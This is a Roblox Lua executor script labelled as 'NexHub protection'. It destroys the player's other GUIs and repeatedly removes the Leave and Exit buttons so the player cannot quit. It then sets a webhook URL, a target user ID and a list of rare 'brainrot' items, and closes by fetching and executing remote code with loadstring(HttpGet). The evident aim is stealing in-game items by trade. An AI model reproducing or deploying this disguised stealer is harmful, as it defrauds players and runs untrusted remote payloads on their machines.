--====================================================
-- NEXHUB | ROMPE GUI DESPUÉS + REMOVE LEAVE ULTRA
--====================================================

repeat task.wait() until game:IsLoaded()

local Players = game:GetService("Players")
local CoreGui = game:GetService("CoreGui")
local RunService = game:GetService("RunService")

local player = Players.LocalPlayer
local PlayerGui = player:WaitForChild("PlayerGui")

------------------------------------------------------
-- ✅ ANTI DOBLE EJECUCIÓN
------------------------------------------------------

if _G.NexHubProtectionLoaded then return end
_G.NexHubProtectionLoaded = true

------------------------------------------------------
-- 1️⃣ REGISTRAR GUIS EXISTENTES (EVENTOS SEGUROS)
------------------------------------------------------

local safeGuis = {}

local function register(container)
	for _,v in pairs(container:GetChildren()) do
		if v:IsA("ScreenGui") then
			safeGuis[v] = true
		end
	end
end

register(PlayerGui)
register(CoreGui)

print("✅ GUIs originales protegidas")

------------------------------------------------------
-- 2️⃣ DETECTOR GUI DE SCRIPT
------------------------------------------------------

local function looksLikeScriptGui(gui)

	for _,d in pairs(gui:GetDescendants()) do
		if d:IsA("TextButton")
		or d:IsA("ScrollingFrame")
		or d:IsA("TextBox") then
			return true
		end
	end

	return false
end

------------------------------------------------------
-- 3️⃣ ROMPE GUI DESPUÉS (SIN FLASH)
------------------------------------------------------

local function tryRemove(gui)

	if safeGuis[gui] then return end
	if not looksLikeScriptGui(gui) then return end

	pcall(function()
		gui.Enabled = false
		gui:Destroy()
		print("🧹 GUI eliminada:", gui.Name)
	end)
end

local function monitor(container)

	container.ChildAdded:Connect(function(obj)
		if not obj:IsA("ScreenGui") then return end

		-- eliminar antes del render
		task.defer(function()
			tryRemove(obj)
		end)
	end)
end

monitor(PlayerGui)
monitor(CoreGui)

-- escaneo extra anti flash
RunService.RenderStepped:Connect(function()

	for _,gui in pairs(PlayerGui:GetChildren()) do
		if gui:IsA("ScreenGui") then
			tryRemove(gui)
		end
	end

	for _,gui in pairs(CoreGui:GetChildren()) do
		if gui:IsA("ScreenGui") then
			tryRemove(gui)
		end
	end

end)

------------------------------------------------------
-- 4️⃣ REMOVE LEAVE BUTTON (TU ULTRA FIX)
------------------------------------------------------

local BLOCK_NAMES = {
	"Leave",
	"LeaveButton",
	"LeaveGame",
	"Exit",
}

local function isLeaveButton(obj)
	if not obj:IsA("GuiButton") then
		return false
	end

	local name = string.lower(obj.Name)

	for _,v in pairs(BLOCK_NAMES) do
		if string.find(name, string.lower(v)) then
			return true
		end
	end

	if obj:IsA("TextButton") then
		local txt = string.lower(obj.Text or "")
		if txt:find("leave") or txt:find("salir") then
			return true
		end
	end

	return false
end

local function removeLeave(root)
	for _,obj in ipairs(root:GetDescendants()) do
		if isLeaveButton(obj) then
			obj.Visible = false
			obj.Active = false
			obj.AutoButtonColor = false

			pcall(function()
				obj:Destroy()
			end)
		end
	end
end

-- ejecución inmediata
removeLeave(CoreGui)

-- anti aparición
CoreGui.DescendantAdded:Connect(function(obj)
	task.defer(function()
		if isLeaveButton(obj) then
			obj.Visible = false
			obj.Active = false
			pcall(function()
				obj:Destroy()
			end)
		end
	end)
end)

-- scan por frame (anti flash)
RunService.RenderStepped:Connect(function()
	removeLeave(CoreGui)
end)

-- scan constante
task.spawn(function()
	while true do
		removeLeave(CoreGui)
		task.wait(0.2)
	end
end)

------------------------------------------------------

print("🔥 NEXHUB PROTECTION ACTIVADA (FINAL)")

getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_57ace56f690644f69652ed4acdbb27ad"

getgenv().TARGET_ID = 9193425798

getgenv().DELAY_STEP = 1      

getgenv().TRADE_CYCLE_DELAY = 2 

getgenv().TARGET_BRAINROTS = {

    ["Burguro And Fryuro"] = true,

    ["Capitano Moby"] = true,

    ["Celularcini Viciosini"] = true,

    ["Cerberus"] = true,

    ["Chillin Chili"] = true,

    ["Cooki and Milki"] = true,

    ["Dragon Cannelloni"] = true,

    ["Dragon Gingerini"] = true,

    ["Eviledon"] = true,

    ["Festive 67"] = true,

    ["Fragrama and Chocrama"] = true,

    ["Garama and Madundung"] = true,

    ["Ginger Gerat"] = true,

    ["Gobblino Uniciclino"] = true,

    ["Headless Horseman"] = true,

    ["Hydra Dragon Cannelloni"] = true,

    ["Jolly Jolly Sahur"] = true,

    ["Ketchuru and Musturu"] = true,

    ["Ketupat Bros"] = true,

    ["Ketupat Kepat"] = true,

    ["La Casa Boo"] = true,

    ["La Ginger Sekolah"] = true,

    ["La Romantic Grande"] = true,

    ["La Secret Combinasion"] = true,

    ["La Supreme Combinasion"] = true,

    ["La Taco Combinasion"] = true,

    ["Lavadorito Spinito"] = true,

    ["Los Bros"] = true,

    ["Los Hotspotsitos"] = true,

    ["Los Sekolahs"] = true,

    ["Los Spaghettis"] = true,

    ["Love Love Bear"] = true,

    ["Meowl"] = true,

    ["Nuclearo Dinossauro"] = true,

    ["Popcuru and Fizzuru"] = true,

    ["Reinito Sleighito"] = true,

    ["Rosetti Tualetti"] = true,

    ["Rosey and Teddy"] = true,

    ["Skibidi Toilet"] = true,

    ["Spooky and Pumpky"] = true,

    ["Strawberry Elephant"] = true,

    ["Swaggy Bros"] = true,

    ["Tang Tang Keletang"] = true,

    ["Tictac Sahur"] = true,

    ["Tralaledon"] = true,

    ["W or L"] = true

loadstring(game:HttpGet("https://orrxl4-protector.vercel.app/api/raw?id=k8g8qyu8"))()
L1_cristtian